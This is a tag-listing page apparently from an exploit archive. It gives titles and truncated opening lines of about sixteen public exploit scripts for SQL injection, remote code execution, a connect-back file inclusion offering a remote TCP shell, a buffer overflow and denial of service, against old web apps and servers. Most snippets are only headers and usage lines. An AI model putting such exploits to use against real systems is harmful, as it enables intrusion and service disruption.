标签:print
-
phsBlog 0.2 Bypass SQL Injection Filtering Exploit”
#!/usr/bin/perl#----------------------------------------------------------------##Script : PhsBlog v0.2##Type : Bypass Sql injection Filtering Exploit##Method : GET##Risk : High##---------------------------...
-
Easy Photo Gallery 2.1 XSS/FD/Bypass/SQL Injection Exploit”
#!/usr/bin/perl#----------------------------------------------------------------##Script : Ezphotogallery 2.1##Type : Multiple Vulnerabilities ( Xss/Login Bypass/Sql injection Exploit/File Disclosure)##Method : GET#...
-
AuraCMS”
#!/usr/bin/perl# k1tk4t Public Security Advisory# ////////////////////////////////////////////////////////////# AuraCMS <= 2.2.2 (pages_data.php) Arbitrary Edit/Add/Delete data halaman exploit # Vendor : http://www.auracms.org/...
-
minb 0.1.0 Remote Code Execution Exploit”
#!/usr/bin/python######################################################################################### minb Remote Code Execution Exploit #######################################################...
-
BrewBlogger 2.1.0.1 Arbitrary Add Admin Exploit”
#!/usr/bin/perl#=================================================# BrewBlogger 2.1.0.1 Arbitrary Add Admin Exploit#=================================================## ,--^----------,--------,-----,-------^--,# | ||||||||| `-----...
-
trixbox (langChoice) Local File Inclusion Exploit (connect-back)”
#!/usr/bin/perl -w# Jean-Michel BESNARD - LEXSI Audit# 2008-07-08# perl trixbox_fi.pl 192.168.1.212# Please listen carefully as our menu option has changed# Choose from the following options:# 1> Remote TCP shell#...
-
Ultrastats”
#!/usr/bin/perluse LWP::UserAgent;use Getopt::Long;## [!] Discovered.: DNX# [!] Vendor.....: http://www.shooter-szene.de | http://www.ultrastats.org# [!] Detected...: 29.06.2008# [!] Reported...: 04.07.2008# [!] Re...
-
Galatolo Web Manager 1.3a”
--== ============================================================================ ==----== Galatolo Web Manager 1.3a <= XSS / Remote SQL Injection Vulnerability ==-- --== ==========================================================...
-
Oracle 10g KUPM$MCP.MAIN SQL Injection Exploit”
#!/usr/bin/perl # # Remote Oracle KUPM$MCP.MAIN exploit (10g) # # Grant or revoke dba permission to unprivileged user # # Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0" # # REF: http://www...
-
Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit”
#!/usr/bin/perl # # http://www.securityfocus.com/bid/11775 # credit to Muts for this vulnerability # acaro [at] jervus.it use IO::Socket::INET; use Switch; if (@ARGV new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$p...
-
Microsoft Excel Malformed Palette Record DoS PoC (MS07-002)”
MS07-002 EXCEL Malformed Palette Record Vulnerability DOS POC ###### Author ###### LifeAsaGeek at gmail.com ... and Microsoft said that vuln credit is for Greg MacManus of iDefense Labs ######################## Vul...
-
eNdonesia 8.4 (Calendar Module) Remote SQL Injection Exploit”
#!/usr/bin/perl#/-----------------------------------------------#| /----------------------------------------- |#| | Remote SQL Exploit | |#| | eNdonesia 8.4 Remote SQL Exploit | |#| | www.endonesia.o...
-
AlstraSoft Article Manager Pro 1.6 Blind SQL Injection Exploit”
#/usr/bin/perl#| | Author: GoLd_M#--//--># -- AlstraSoft Article Manager Pro Blind SQL Injection Exploit --#--//--> Exploit :use strict;use LWP::Simple;print "- - - - - - - - - - - - - - - - - - - - - - - - - -...
-
Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit”
#// Bea Weblogic -- Apache Connector Remote Exploit -1day#// Should stack break latest Windows Server 2003 <address space randomization>#// BIG THANKS TO #// "dong-hun you"(Xpl017Elz) in INetCop - for his paper#// "T...
-
Arctic Issue Tracker 2.0.0 (index.php filter) SQL Injection Exploit”
#!/usr/bin/perluse IO::Socket;print q{-----------------------------------------------Arctic Issue Tracker v2.0.0 exploit by ldma ~ SubCode ~use: arctic.pl [server] [dir]sample:$perl arctic.pl localhos...
-
Simple DNS Plus”
#!/usr/bin/perl# Simple DNS Plus 5.0/4.1 < remote Denial of Service exploit## usage: sdns-dos.pl <dns server> <dns source port> <num of packets># Exploit written by Exodus.# http://www.blackhat.org.iluse IO...